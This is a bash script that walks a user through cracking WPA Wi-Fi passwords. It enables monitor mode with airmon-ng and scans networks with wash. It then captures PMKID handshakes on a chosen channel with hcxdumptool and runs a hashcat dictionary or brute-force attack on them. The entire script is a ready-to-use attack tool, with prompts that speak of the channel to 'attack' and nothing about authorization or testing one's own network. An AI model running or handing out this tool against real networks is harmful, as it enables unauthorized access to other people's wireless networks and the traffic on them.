#!/bin/bash
echo "This script requires the following tools to run successfully: Hashcat, hcxdumptool, hcxpcaptool, airmon-ng, wash, and an appropriate dictionary file. Please ensure you know the full path to that file prior to running this script. i.e. /etc/user/share/seclists/dictionary.txt. Press enter to continue"
read
echo ""
echo "What interface do you want to work with? "
read INTERFACE
airmon-ng start $INTERFACE
echo "What do you want to name the pcap? "
read PCAP
echo "Next, you'll select your channel. Press enter and a window will pop up to show you whats available "
read
xterm -e wash -i $INTERFACE
echo "What channel do you want to attack? (format 1,3,5,etc. no spaces) "
echo ""
echo "1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 32, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, 60, 62, 64, 68, 96, 100, 102, 104, 106, 108, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128, 132, 134, 136, 138, 140, 142, 144, 149, 151, 153, 155, 157, 159, 161, 165, 169, 173"
read CHANNEL
echo "What hashcat workload profile do you want to use? 1 - Low > 2 - Default > 3 - High > 4 - Nightmare " 
read PROFILE
echo "What attack mode? 0 - Straight (best) > 1 - Combination > 3 - Brute-force "
read ATTACKMODE 
echo "Press enter to continue...."
read
xterm -e hcxdumptool -i $INTERFACE -o $PCAP.pcapng --enable_status=1 -c $CHANNEL
echo "Press enter to continue "
read
xterm -e hcxpcaptool -E essidlist -I identitylist -U usernamelist -z $PCAP.16800 $PCAP.pcapng
echo "Press enter to prepare hashcat..."
read
echo "What dictionary file do you want to use? "
read DICTIONARY
echo "Press enter to attack"
read
hashcat -m 16800 $PCAP.16800 -a $ATTACKMODE --kernel-accel=1 -w $PROFILE --force "$DICTIONARY"
echo "Attack complete. Press enter to exit"
read
exit
